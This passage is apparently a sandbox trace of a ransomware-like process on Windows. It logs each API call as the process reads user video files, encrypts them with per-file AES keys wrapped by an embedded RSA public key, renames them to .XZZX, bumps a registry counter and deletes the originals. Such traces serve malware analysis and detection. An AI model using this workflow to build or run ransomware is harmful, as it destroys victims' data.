MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.325] lstrcpyW (in: lpString1=0x434f460, lpString2="q_QGnOQQGbujC4p8q.swf" | out: lpString1="q_QGnOQQGbujC4p8q.swf") returned="q_QGnOQQGbujC4p8q.swf" [0131.325] lstrcpyW (in: lpString1=0x434e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0131.325] SetErrorMode (uMode=0x1) returned 0x1 [0131.325] lstrcpyW (in: lpString1=0x434f860, lpString2="q_QGnOQQGbujC4p8q.swf" | out: lpString1="q_QGnOQQGbujC4p8q.swf") returned="q_QGnOQQGbujC4p8q.swf" [0131.325] CoCreateGuid (in: pguid=0x434e440 | out: pguid=0x434e440*(Data1=0xc5439a52, Data2=0x7113, Data3=0x4116, Data4=([0]=0x9b, [1]=0x52, [2]=0x39, [3]=0x2a, [4]=0xdb, [5]=0xe2, [6]=0x3c, [7]=0x1d))) returned 0x0 [0131.325] wsprintfW (in: param_1=0x434ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\q_QGnOQQGbujC4p8q.swf") returned 101 [0131.325] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x434fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0131.325] wsprintfW (in: param_1=0x434e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7B22A6161CBF8AA2C5439A5220F46EEA.XZZX") returned 117 [0131.325] StrStrW (lpFirst="q_QGnOQQGbujC4p8q.swf", lpSrch="XZZX") returned 0x0 [0131.325] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\q_QGnOQQGbujC4p8q.swf", dwFileAttributes=0x20) returned 1 [0131.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\q_QGnOQQGbujC4p8q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\q_qgnoqqgbujc4p8q.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x69c [0131.326] ReadFile (in: hFile=0x69c, lpBuffer=0x4367d60, nNumberOfBytesToRead=0xbd22, lpNumberOfBytesRead=0x434e418, lpOverlapped=0x0 | out: lpBuffer=0x4367d60*, lpNumberOfBytesRead=0x434e418*=0xbd22, lpOverlapped=0x0) returned 1 [0131.327] CloseHandle (hObject=0x69c) returned 1 [0131.327] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0131.327] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0131.328] SetErrorMode (uMode=0x1) returned 0x1 [0131.328] lstrcpyW (in: lpString1=0x434e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0131.328] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf7268) returned 1 [0131.330] CryptGenKey (in: hProv=0x3cf7268, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d10ed8) returned 1 [0131.460] CryptExportKey (in: hKey=0x3d10ed8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x434e41c | out: pbData=0x0*, pdwDataLen=0x434e41c*=0x94) returned 1 [0131.460] CryptExportKey (in: hKey=0x3d10ed8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x434e41c | out: pbData=0x40a0000*, pdwDataLen=0x434e41c*=0x94) returned 1 [0131.460] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.460] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0131.460] CryptDestroyKey (hKey=0x3d10ed8) returned 1 [0131.461] CryptReleaseContext (hProv=0x3cf7268, dwFlags=0x0) returned 0 [0131.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\7B22A6161CBF8AA2C5439A5220F46EEA.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\7b22a6161cbf8aa2c5439a5220f46eea.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6ac [0131.461] WriteFile (in: hFile=0x6ac, lpBuffer=0x4367d60*, nNumberOfBytesToWrite=0xbd22, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x4367d60*, lpNumberOfBytesWritten=0x434e438*=0xbd22, lpOverlapped=0x0) returned 1 [0131.462] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd22 [0131.462] WriteFile (in: hFile=0x6ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0131.462] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd27 [0131.462] WriteFile (in: hFile=0x6ac, lpBuffer=0x434f860*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x434f860*, lpNumberOfBytesWritten=0x434e438*=0x2a, lpOverlapped=0x0) returned 1 [0131.462] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd51 [0131.462] WriteFile (in: hFile=0x6ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0131.462] SetFilePointer (in: hFile=0x6ac, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd56 [0131.462] SetErrorMode (uMode=0x1) returned 0x1 [0131.462] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0131.462] OutputDebugStringW (lpOutputString="end") [0131.463] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v0\x88Ê\x03`Õ4\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x434dbf4, pcbBinary=0x434d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0131.463] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x434dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8 | out: pvStructInfo=0x434d3dc, pcbStructInfo=0x434d3d8) returned 1 [0131.463] CryptAcquireContextW (in: phProv=0x434d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x434d3e4*=0x3cf7400) returned 1 [0131.463] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7400, dwCertEncodingType=0x1, pInfo=0x3d0eda8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3d0edd8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3d0ede0*, PublicKey.cUnusedBits=0x0), phKey=0x434d3ec | out: phKey=0x434d3ec*=0x3d10ed8) returned 1 [0131.463] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.464] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0131.464] CryptEncrypt (in: hKey=0x3d10ed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x434d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x434d3f0*=0x80) returned 1 [0131.464] CryptEncrypt (in: hKey=0x3d10ed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7488*, pdwDataLen=0x434d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7488*, pdwDataLen=0x434d3e8*=0x80) returned 1 [0131.464] WriteFile (in: hFile=0x6ac, lpBuffer=0x3cf7488*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7488*, lpNumberOfBytesWritten=0x434e438*=0x80, lpOverlapped=0x0) returned 1 [0131.464] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0131.464] WriteFile (in: hFile=0x6ac, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x434e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x434e438*=0x5, lpOverlapped=0x0) returned 1 [0131.464] GetUserNameW (in: lpBuffer=0x434e1f8, pcbBuffer=0x434dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x434dfe0) returned 1 [0131.464] wsprintfW (in: param_1=0x434dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0131.464] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe4 | out: phkResult=0x434dfe4*=0x6b0) returned 0x0 [0131.464] RegQueryValueExW (in: hKey=0x6b0, lpValueName="E1010314", lpReserved=0x0, lpType=0x434dfd8, lpData=0x434dfec, lpcbData=0x434dfdc*=0x4 | out: lpType=0x434dfd8*=0x4, lpData=0x434dfec*=0xb4, lpcbData=0x434dfdc*=0x4) returned 0x0 [0131.464] RegCloseKey (hKey=0x6b0) returned 0x0 [0131.464] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x434dfe8 | out: phkResult=0x434dfe8*=0x6b0) returned 0x0 [0131.464] RegSetValueExW (in: hKey=0x6b0, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x434dfec*=0xb5, cbData=0x4 | out: lpData=0x434dfec*=0xb5) returned 0x0 [0131.464] RegCloseKey (hKey=0x6b0) returned 0x0 [0131.464] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.465] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.465] CloseHandle (hObject=0x6ac) returned 1 [0131.466] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0131.466] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0131.466] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\q_QGnOQQGbujC4p8q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\q_qgnoqqgbujc4p8q.swf")) returned 1 [0131.467] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\q_QGnOQQGbujC4p8q.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\q_qgnoqqgbujc4p8q.swf")) returned 0 Thread: id = 445 os_tid = 0xa44 [0131.623] lstrcpyA (in: lpString1=0x420fc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0131.623] lstrcpyW (in: lpString1=0x420f460, lpString2="wMr3QKnu.mp4" | out: lpString1="wMr3QKnu.mp4") returned="wMr3QKnu.mp4" [0131.623] lstrcpyW (in: lpString1=0x420e860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0131.623] SetErrorMode (uMode=0x1) returned 0x1 [0131.624] lstrcpyW (in: lpString1=0x420f860, lpString2="wMr3QKnu.mp4" | out: lpString1="wMr3QKnu.mp4") returned="wMr3QKnu.mp4" [0131.624] CoCreateGuid (in: pguid=0x420e440 | out: pguid=0x420e440*(Data1=0xcf6e219f, Data2=0xbd93, Data3=0x408d, Data4=([0]=0xb4, [1]=0x90, [2]=0x15, [3]=0x35, [4]=0x51, [5]=0x5b, [6]=0x8f, [7]=0x59))) returned 0x0 [0131.624] wsprintfW (in: param_1=0x420ec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\wMr3QKnu.mp4") returned 92 [0131.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x420fee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0131.624] wsprintfW (in: param_1=0x420e450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX") returned 117 [0131.624] StrStrW (lpFirst="wMr3QKnu.mp4", lpSrch="XZZX") returned 0x0 [0131.624] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\wMr3QKnu.mp4", dwFileAttributes=0x20) returned 1 [0131.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\wMr3QKnu.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\wmr3qknu.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x698 [0131.625] ReadFile (in: hFile=0x698, lpBuffer=0x4378cf8, nNumberOfBytesToRead=0x15c89, lpNumberOfBytesRead=0x420e418, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesRead=0x420e418*=0x15c89, lpOverlapped=0x0) returned 1 [0131.626] CloseHandle (hObject=0x698) returned 1 [0131.626] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0131.626] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40e0000 [0131.626] SetErrorMode (uMode=0x1) returned 0x1 [0131.626] lstrcpyW (in: lpString1=0x420e358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0131.626] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x3cf7510) returned 1 [0131.629] CryptGenKey (in: hProv=0x3cf7510, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d10f18) returned 1 [0131.795] CryptExportKey (in: hKey=0x3d10f18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x420e41c | out: pbData=0x0*, pdwDataLen=0x420e41c*=0x94) returned 1 [0131.795] CryptExportKey (in: hKey=0x3d10f18, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40e0000, pdwDataLen=0x420e41c | out: pbData=0x40e0000*, pdwDataLen=0x420e41c*=0x94) returned 1 [0131.795] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.795] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0131.795] CryptDestroyKey (hKey=0x3d10f18) returned 1 [0131.795] CryptReleaseContext (hProv=0x3cf7510, dwFlags=0x0) returned 1 [0131.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\6B0FB14D2FCD29F7CF6E219F33EE0E3F.XZZX" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dtms 07a7aq-xeuh0\\2ss69ds5b7dlsjshty0o\\6b0fb14d2fcd29f7cf6e219f33ee0e3f.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x698 [0131.796] WriteFile (in: hFile=0x698, lpBuffer=0x4378cf8*, nNumberOfBytesToWrite=0x15c89, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x4378cf8*, lpNumberOfBytesWritten=0x420e438*=0x15c89, lpOverlapped=0x0) returned 1 [0131.797] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15c89 [0131.797] WriteFile (in: hFile=0x698, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0131.797] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15c8e [0131.797] WriteFile (in: hFile=0x698, lpBuffer=0x420f860*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x420f860*, lpNumberOfBytesWritten=0x420e438*=0x18, lpOverlapped=0x0) returned 1 [0131.798] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15ca6 [0131.798] WriteFile (in: hFile=0x698, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0131.798] SetFilePointer (in: hFile=0x698, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x15cab [0131.798] SetErrorMode (uMode=0x1) returned 0x1 [0131.798] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0131.798] OutputDebugStringW (lpOutputString="end") [0131.798] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ \x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x420dbf4, pcbBinary=0x420d3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0131.798] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x420dbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8 | out: pvStructInfo=0x420d3dc, pcbStructInfo=0x420d3d8) returned 1 [0131.798] CryptAcquireContextW (in: phProv=0x420d3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x420d3e4*=0x3cf7510) returned 1 [0131.799] CryptImportPublicKeyInfo (in: hCryptProv=0x3cf7510, dwCertEncodingType=0x1, pInfo=0x3cf1440*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf1470*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf1478*, PublicKey.cUnusedBits=0x0), phKey=0x420d3ec | out: phKey=0x420d3ec*=0x3d10fd8) returned 1 [0131.799] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0131.799] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0131.799] CryptEncrypt (in: hKey=0x3d10fd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x420d3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x420d3f0*=0x80) returned 1 [0131.799] CryptEncrypt (in: hKey=0x3d10fd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3cf7598*, pdwDataLen=0x420d3e8*=0x75, dwBufLen=0x80 | out: pbData=0x3cf7598*, pdwDataLen=0x420d3e8*=0x80) returned 1 [0131.799] WriteFile (in: hFile=0x698, lpBuffer=0x3cf7598*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x3cf7598*, lpNumberOfBytesWritten=0x420e438*=0x80, lpOverlapped=0x0) returned 1 [0131.799] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0131.799] WriteFile (in: hFile=0x698, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x420e438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x420e438*=0x5, lpOverlapped=0x0) returned 1 [0131.799] GetUserNameW (in: lpBuffer=0x420e1f8, pcbBuffer=0x420dfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x420dfe0) returned 1 [0131.801] wsprintfW (in: param_1=0x420dff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0131.801] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe4 | out: phkResult=0x420dfe4*=0x69c) returned 0x0 [0131.801] RegQueryValueExW (in: hKey=0x69c, lpValueName="E1010314", lpReserved=0x0, lpType=0x420dfd8, lpData=0x420dfec, lpcbData=0x420dfdc*=0x4 | out: lpType=0x420dfd8*=0x4, lpData=0x420dfec*=0xb5, lpcbData=0x420dfdc*=0x4) returned 0x0 [0131.801] RegCloseKey (hKey=0x69c) returned 0x0 [0131.801] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x420dfe8 | out: phkResult=0x420dfe8*=0x69c) returned 0x0 [0131.802] RegSetValueExW (in: hKey=0x69c, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x420dfec*=0xb6, cbData=0x4 | out: lpData=0x420dfec*=0xb6) returned 0x0 [0131.802] RegCloseKey (hKey=0x69c) returned 0x0 [0131.802] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 